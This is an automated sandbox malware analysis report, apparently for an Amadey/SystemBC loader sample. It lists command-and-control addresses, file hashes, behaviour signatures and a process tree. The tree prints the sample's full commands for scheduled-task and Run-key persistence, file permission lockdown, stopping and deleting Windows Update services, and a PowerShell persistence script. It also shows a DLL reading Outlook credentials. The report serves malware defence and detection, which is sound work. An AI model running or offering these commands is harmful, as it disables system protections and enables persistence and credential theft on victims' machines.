Analysis
-
max time kernel
158s -
max time network
241s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
09-12-2022 09:52
Static task
static1
Behavioral task
behavioral1
Sample
2239a58cc93fd94dc2806ce7f6af0a0b.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
2239a58cc93fd94dc2806ce7f6af0a0b.exe
Resource
win10v2004-20220812-en
General
-
Target
2239a58cc93fd94dc2806ce7f6af0a0b.exe
-
Size
7.4MB
-
MD5
2239a58cc93fd94dc2806ce7f6af0a0b
-
SHA1
f09eb7d69bc7440d3d45e14267236a78ac789fcb
-
SHA256
682abd62b6e3c0e8ca57f079cd96f2d3848752eaf7002bdf57bfb512bd242811
-
SHA512
f77c16626a0e17ff79b95f9fded6a365f913896c89baf76d16bcc8706f3ad10a9476c7cbd3f235250b936171c6e958e145c402952506dc0e434a4f911c99fe02
-
SSDEEP
196608:U+rNR2F7EU+iE09OKsRk3PdM+i+8lHFL9AYS:/RWEU+1OP6+X+oYS
Malware Config
Extracted
amadey
3.50
85.209.135.109/jg94cVd30f/index.php
Extracted
systembc
89.22.236.225:4193
176.124.205.5:4193
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
Emit64.exedescription pid process target process PID 1468 created 1212 1468 Emit64.exe Explorer.EXE PID 1468 created 1212 1468 Emit64.exe Explorer.EXE PID 1468 created 1212 1468 Emit64.exe Explorer.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 11 2036 rundll32.exe 12 1048 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
Emit64.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts Emit64.exe -
Executes dropped EXE 8 IoCs
Processes:
gntuud.exeEmit64.exegntuud.exeavicapn32.exeumciavi32.exeEngine.exegntuud.exegntuud.exepid process 2024 gntuud.exe 1468 Emit64.exe 896 gntuud.exe 1960 avicapn32.exe 1084 umciavi32.exe 336 Engine.exe 564 gntuud.exe 1540 gntuud.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\SETUP_22224\Engine.exe upx behavioral1/memory/1084-116-0x0000000002240000-0x0000000002398000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\SETUP_22224\Engine.exe upx behavioral1/memory/336-122-0x0000000000400000-0x0000000000558000-memory.dmp upx behavioral1/memory/336-166-0x0000000000400000-0x0000000000558000-memory.dmp upx -
Loads dropped DLL 14 IoCs
Processes:
2239a58cc93fd94dc2806ce7f6af0a0b.exegntuud.exerundll32.exeumciavi32.exerundll32.exepid process 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe 2024 gntuud.exe 2024 gntuud.exe 2024 gntuud.exe 2036 rundll32.exe 2036 rundll32.exe 2036 rundll32.exe 2036 rundll32.exe 2024 gntuud.exe 1084 umciavi32.exe 1048 rundll32.exe 1048 rundll32.exe 1048 rundll32.exe 1048 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
gntuud.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Emit64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000017001\\Emit64.exe" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\avicapn32.exe = "C:\\Users\\Admin\\1000018002\\avicapn32.exe" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\syncfiles.dll = "rundll32 C:\\Users\\Admin\\1000019012\\syncfiles.dll, rundll" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\umciavi32.exe = "C:\\Users\\Admin\\AppData\\Roaming\\1000021000\\umciavi32.exe" gntuud.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
Processes:
2239a58cc93fd94dc2806ce7f6af0a0b.exegntuud.exeEmit64.exegntuud.exeavicapn32.exerundll32.exegntuud.exerundll32.exegntuud.exepid process 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe 2024 gntuud.exe 2024 gntuud.exe 1468 Emit64.exe 1468 Emit64.exe 896 gntuud.exe 896 gntuud.exe 1960 avicapn32.exe 1960 avicapn32.exe 2036 rundll32.exe 2036 rundll32.exe 564 gntuud.exe 564 gntuud.exe 1048 rundll32.exe 1048 rundll32.exe 1540 gntuud.exe 1540 gntuud.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1476 sc.exe 360 sc.exe 1748 sc.exe 108 sc.exe 1384 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 10 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
2239a58cc93fd94dc2806ce7f6af0a0b.exegntuud.exeEmit64.exegntuud.exeavicapn32.exerundll32.exegntuud.exerundll32.exepowershell.exepowershell.exegntuud.exepid process 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe 2024 gntuud.exe 1468 Emit64.exe 896 gntuud.exe 1960 avicapn32.exe 2036 rundll32.exe 564 gntuud.exe 1048 rundll32.exe 1048 rundll32.exe 1048 rundll32.exe 1048 rundll32.exe 1048 rundll32.exe 1540 powershell.exe 1540 powershell.exe 1048 rundll32.exe 1468 Emit64.exe 1468 Emit64.exe 1468 Emit64.exe 1468 Emit64.exe 1468 Emit64.exe 1468 Emit64.exe 1052 powershell.exe 1540 gntuud.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exedescription pid process Token: SeDebugPrivilege 1540 powershell.exe Token: SeShutdownPrivilege 692 powercfg.exe Token: SeShutdownPrivilege 1472 powercfg.exe Token: SeShutdownPrivilege 1148 powercfg.exe Token: SeShutdownPrivilege 1324 powercfg.exe Token: SeDebugPrivilege 1052 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2239a58cc93fd94dc2806ce7f6af0a0b.exegntuud.execmd.exetaskeng.exedescription pid process target process PID 1228 wrote to memory of 2024 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe gntuud.exe PID 1228 wrote to memory of 2024 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe gntuud.exe PID 1228 wrote to memory of 2024 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe gntuud.exe PID 1228 wrote to memory of 2024 1228 2239a58cc93fd94dc2806ce7f6af0a0b.exe gntuud.exe PID 2024 wrote to memory of 1380 2024 gntuud.exe schtasks.exe PID 2024 wrote to memory of 1380 2024 gntuud.exe schtasks.exe PID 2024 wrote to memory of 1380 2024 gntuud.exe schtasks.exe PID 2024 wrote to memory of 1380 2024 gntuud.exe schtasks.exe PID 2024 wrote to memory of 1560 2024 gntuud.exe cmd.exe PID 2024 wrote to memory of 1560 2024 gntuud.exe cmd.exe PID 2024 wrote to memory of 1560 2024 gntuud.exe cmd.exe PID 2024 wrote to memory of 1560 2024 gntuud.exe cmd.exe PID 1560 wrote to memory of 1064 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 1064 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 1064 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 1064 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 336 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 336 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 336 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 336 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1048 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1048 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1048 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1048 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1724 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 1724 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 1724 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 1724 1560 cmd.exe cmd.exe PID 1560 wrote to memory of 1476 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1476 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1476 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1476 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1284 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1284 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1284 1560 cmd.exe cacls.exe PID 1560 wrote to memory of 1284 1560 cmd.exe cacls.exe PID 2024 wrote to memory of 1468 2024 gntuud.exe Emit64.exe PID 2024 wrote to memory of 1468 2024 gntuud.exe Emit64.exe PID 2024 wrote to memory of 1468 2024 gntuud.exe Emit64.exe PID 2024 wrote to memory of 1468 2024 gntuud.exe Emit64.exe PID 1480 wrote to memory of 896 1480 taskeng.exe gntuud.exe PID 1480 wrote to memory of 896 1480 taskeng.exe gntuud.exe PID 1480 wrote to memory of 896 1480 taskeng.exe gntuud.exe PID 1480 wrote to memory of 896 1480 taskeng.exe gntuud.exe PID 2024 wrote to memory of 1960 2024 gntuud.exe avicapn32.exe PID 2024 wrote to memory of 1960 2024 gntuud.exe avicapn32.exe PID 2024 wrote to memory of 1960 2024 gntuud.exe avicapn32.exe PID 2024 wrote to memory of 1960 2024 gntuud.exe avicapn32.exe PID 2024 wrote to memory of 2036 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 2036 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 2036 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 2036 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 2036 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 2036 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 2036 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 1084 2024 gntuud.exe umciavi32.exe PID 2024 wrote to memory of 1084 2024 gntuud.exe umciavi32.exe PID 2024 wrote to memory of 1084 2024 gntuud.exe umciavi32.exe PID 2024 wrote to memory of 1084 2024 gntuud.exe umciavi32.exe PID 2024 wrote to memory of 1048 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 1048 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 1048 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 1048 2024 gntuud.exe rundll32.exe PID 2024 wrote to memory of 1048 2024 gntuud.exe rundll32.exe -
outlook_win_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\2239a58cc93fd94dc2806ce7f6af0a0b.exe"C:\Users\Admin\AppData\Local\Temp\2239a58cc93fd94dc2806ce7f6af0a0b.exe"2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe" /F4⤵
- Creates scheduled task(s)
PID:1380 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\03bd543fce" /P "Admin:N"&&CACLS "..\03bd543fce" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1064
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:N"5⤵PID:336
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:R" /E5⤵PID:1048
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:N"5⤵PID:1476
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1724
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:R" /E5⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"C:\Users\Admin\AppData\Local\Temp\1000017001\Emit64.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1468 -
C:\Users\Admin\1000018002\avicapn32.exe"C:\Users\Admin\1000018002\avicapn32.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1960 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000019012\syncfiles.dll, rundll4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2036 -
C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exe"C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\SETUP_22224\Engine.exeC:\Users\Admin\AppData\Local\Temp\SETUP_22224\Engine.exe /TH_ID=_988 /OriginExe="C:\Users\Admin\AppData\Roaming\1000021000\umciavi32.exe"5⤵
- Executes dropped EXE
PID:336 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd < Cause.eml6⤵PID:972
-
C:\Windows\SysWOW64\cmd.execmd7⤵PID:1628
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avastui8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
PID:1048 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:1988
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1476 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:360 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1748 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:108 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1384 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:564
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:820
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1680 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1900
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:112
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1936
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\Admin\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\Admin\Locktime\RtkAudUService64.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn RtkAudUService64.exe /tr 'C:\Users\Admin\Locktime\RtkAudUService64.exe'3⤵
- Creates scheduled task(s)
PID:280
-
C:\Windows\system32\taskeng.exetaskeng.exe {4B652C77-CCA7-4874-98E2-130F0108F429} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:896 -
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:564 -
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1540
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12.1MB
MD50f6ef96c5e687631ef27f1dcd1afe7b4
SHA1ea8aeee11c243e3eacfa6753f708c20cbba39aac
SHA25638381a42975028b181430a80d6009988d0d0cfa42493d3efbbfb72d3abe97648
SHA5123ae1986071afffbed1978be560d5159f563d699be798e6ab6dc616a82104467b79ec872c891e11615d3793348730f311bce3a63f1ce289bb8d7c73399c26c5c9
-
Filesize
12.1MB
MD50f6ef96c5e687631ef27f1dcd1afe7b4
SHA1ea8aeee11c243e3eacfa6753f708c20cbba39aac
SHA25638381a42975028b181430a80d6009988d0d0cfa42493d3efbbfb72d3abe97648
SHA5123ae1986071afffbed1978be560d5159f563d699be798e6ab6dc616a82104467b79ec872c891e11615d3793348730f311bce3a63f1ce289bb8d7c73399c26c5c9
-
Filesize
7.2MB
MD50d079a931e42f554016db36476e55ba7
SHA1d5f1ab52221019c746f1cc59a45ce18d0b817496
SHA256ead2c5aaf92fe07db45b99587f586c7a45f92c67220cd8113a5d2e7bcb320798
SHA5121496f1296df89e1da8780f175631e2551300a99e6c7ea43d2750653fdf6e7ed096fdedd9f0d23b94190ecf418da09cf9c9b6caee5821ba1c457f0294063bbc9e
-
Filesize
7.4MB
MD52239a58cc93fd94dc2806ce7f6af0a0b
SHA1f09eb7d69bc7440d3d45e14267236a78ac789fcb
SHA256682abd62b6e3c0e8ca57f079cd96f2d3848752eaf7002bdf57bfb512bd242811
SHA512f77c16626a0e17ff79b95f9fded6a365f913896c89baf76d16bcc8706f3ad10a9476c7cbd3f235250b936171c6e958e145c402952506dc0e434a4f911c99fe02
-
Filesize
7.4MB
MD52239a58cc93fd94dc2806ce7f6af0a0b
SHA1f09eb7d69bc7440d3d45e14267236a78ac789fcb
SHA256682abd62b6e3c0e8ca57f079cd96f2d3848752eaf7002bdf57bfb512bd242811
SHA512f77c16626a0e17ff79b95f9fded6a365f913896c89baf76d16bcc8706f3ad10a9476c7cbd3f235250b936171c6e958e145c402952506dc0e434a4f911c99fe02
-
Filesize
7.4MB
MD52239a58cc93fd94dc2806ce7f6af0a0b
SHA1f09eb7d69bc7440d3d45e14267236a78ac789fcb
SHA256682abd62b6e3c0e8ca57f079cd96f2d3848752eaf7002bdf57bfb512bd242811
SHA512f77c16626a0e17ff79b95f9fded6a365f913896c89baf76d16bcc8706f3ad10a9476c7cbd3f235250b936171c6e958e145c402952506dc0e434a4f911c99fe02
-
Filesize
7.4MB
MD52239a58cc93fd94dc2806ce7f6af0a0b
SHA1f09eb7d69bc7440d3d45e14267236a78ac789fcb
SHA256682abd62b6e3c0e8ca57f079cd96f2d3848752eaf7002bdf57bfb512bd242811
SHA512f77c16626a0e17ff79b95f9fded6a365f913896c89baf76d16bcc8706f3ad10a9476c7cbd3f235250b936171c6e958e145c402952506dc0e434a4f911c99fe02
-
Filesize
7.4MB
MD52239a58cc93fd94dc2806ce7f6af0a0b
SHA1f09eb7d69bc7440d3d45e14267236a78ac789fcb
SHA256682abd62b6e3c0e8ca57f079cd96f2d3848752eaf7002bdf57bfb512bd242811
SHA512f77c16626a0e17ff79b95f9fded6a365f913896c89baf76d16bcc8706f3ad10a9476c7cbd3f235250b936171c6e958e145c402952506dc0e434a4f911c99fe02
-
Filesize
9.9MB
MD57a5155b804e592d83f8319cbdb27e164
SHA1da63718377b9086ef7f6db6b8b88e45062f31749
SHA2565eb7b2fd13264f066b10946539eff6be750647de246cf791e57ca4c17b0b9c31
SHA5123dbd6745d7b64ef2260e14df08c6aa36ee7e34b218dc11c83f5fbcaa934cf1385e79d208e061b9055c389cd5259ae2081b8dea47fac38844a2043b9a361d0346
-
Filesize
9.9MB
MD57a5155b804e592d83f8319cbdb27e164
SHA1da63718377b9086ef7f6db6b8b88e45062f31749
SHA2565eb7b2fd13264f066b10946539eff6be750647de246cf791e57ca4c17b0b9c31
SHA5123dbd6745d7b64ef2260e14df08c6aa36ee7e34b218dc11c83f5fbcaa934cf1385e79d208e061b9055c389cd5259ae2081b8dea47fac38844a2043b9a361d0346
-
Filesize
872KB
MD5ccd28303d0a9104f491fa604338d7bee
SHA12b75395b1325c15b869659ba31af4c69d9415d6b
SHA256bdcbe947182623e50b815d7775ef17fe03efad1f409bf3077a667df353b087e9
SHA512a286db35eff2c79df972532950d4b3135b977319210d3f6056af27003bc4bea0aeeb897dd029920b8ab3e532eb70a8a6cd653574aeb15cbbe7e13ffcc953091a
-
Filesize
10KB
MD5b415a45148ad7e42685811c3afd188f8
SHA1c88711600487c0449849b4c0f7fe2fe303f8f459
SHA2569f24a88750b82e2e456fd41449b29280e3f257ad62952b4f9d410221d0ba2542
SHA5124de877efe44c56936de9900c3a515a293abed81ac355376b20888581f629a4f5eee4f5db999b2a6f8a8094b118f54dc445365a8d60a542057ef8f93e1f22fce3
-
Filesize
1.3MB
MD53421757f64473b27d5e538cbeaec2833
SHA12ce9ce4f0c6bc70e6982f4aeee031639c146f59f
SHA256efda94f9dc93bbd3af9fa5ff8ffcb99d506cddf277f0ab00870d98c264574dcf
SHA512ee76010d17d6ac6c5cf43cf918436b049e3cfdf5f5ea6b977ca31cf8e9ae9a3e707c09ec2df5cbd5313cf4efc9fb7705615ea1dec9e59c3db03f766c57335083
-
Filesize
392KB
MD5a7a99a201774531d761f6aac2651a9df
SHA1b122ae368c4bf103e959a6ebb54ddb310117ab96
SHA256e6e73497e85e9ece4c92ac7d49e07b9d55e932ba2d9e5789b94b95a9841ee524
SHA512056504da2afeed547a4123ac8c38b35291b7dc0126fb638ae304eee802ac572715f9d608e9f1655788a030f488354741ee27c805434111c8e915cf841c0892f1
-
Filesize
7KB
MD51dd88f67f029710d5c5858a6293a93f1
SHA13e5ef66613415fe9467b2a24ccc27d8f997e7df6
SHA256b5dad33ceb6eb1ac2a05fbda76e29a73038403939218a88367925c3a20c05532
SHA5127071fd64038e0058c8c586c63c62677c0ca403768100f90323cf9c0bc7b7fcb538391e6f3606bd7970b8769445606ada47adcdcfc1e991e25caf272a13e10c94
-
Filesize
2KB
MD58fdcb77e72aeef974e2441747545eefb
SHA1621389d4e9bb81ff80745b4327ac2ce5579e074e
SHA2560449f6c4716600993f1680938a33487a4cc5dd8aec3abf83096d776faf121813
SHA51206b5dac14973788445a5e1abb1bf9842f44f4f726c528b0779fb2692e3dff03f2ad9537b8b738a4e515c29ba2e6b781cd40d363f039684bb130e8f391b828457
-
Filesize
1.6MB
MD5b66347e9a4018f257a6bf1941b4a5d60
SHA10f4a358ad14e441f74c634054d798e6be2da476d
SHA256d74bf0394de0ad2adcfd7ecc96711bac682f3749f8953701eefc596b8c11dd36
SHA512eab7414a3d2ed2aab80eb4452e8b30b6e7481e7cb48bdb986450196ea8695008f7b26d3ee423934a0d6b30650ccd3e50b64cc979723d9df2df31052875c04695
-
Filesize
1.6MB
MD5b66347e9a4018f257a6bf1941b4a5d60
SHA10f4a358ad14e441f74c634054d798e6be2da476d
SHA256d74bf0394de0ad2adcfd7ecc96711bac682f3749f8953701eefc596b8c11dd36
SHA512eab7414a3d2ed2aab80eb4452e8b30b6e7481e7cb48bdb986450196ea8695008f7b26d3ee423934a0d6b30650ccd3e50b64cc979723d9df2df31052875c04695
-
Filesize
7.3MB
MD52b62e02b3581980ee5a1dda42fa4f3fe
SHA15c36bfa4a4973e8f694d5c077e7312b1c991aedf
SHA2568c46c2af1cb25bfa8fbbf9d683d72d30ddb2e5d0ecc6bba997b24714cf2b8c91
SHA512255e1b1d51d52872c5e0c54f7807adc3581d36b3dfb8220c818ac38ac7fcea91dd42999ee6ccaef3b9836cd59fcfe19c2669a5b697d627de4c1d9b8ba563eb3d
-
Filesize
12.1MB
MD50f6ef96c5e687631ef27f1dcd1afe7b4
SHA1ea8aeee11c243e3eacfa6753f708c20cbba39aac
SHA25638381a42975028b181430a80d6009988d0d0cfa42493d3efbbfb72d3abe97648
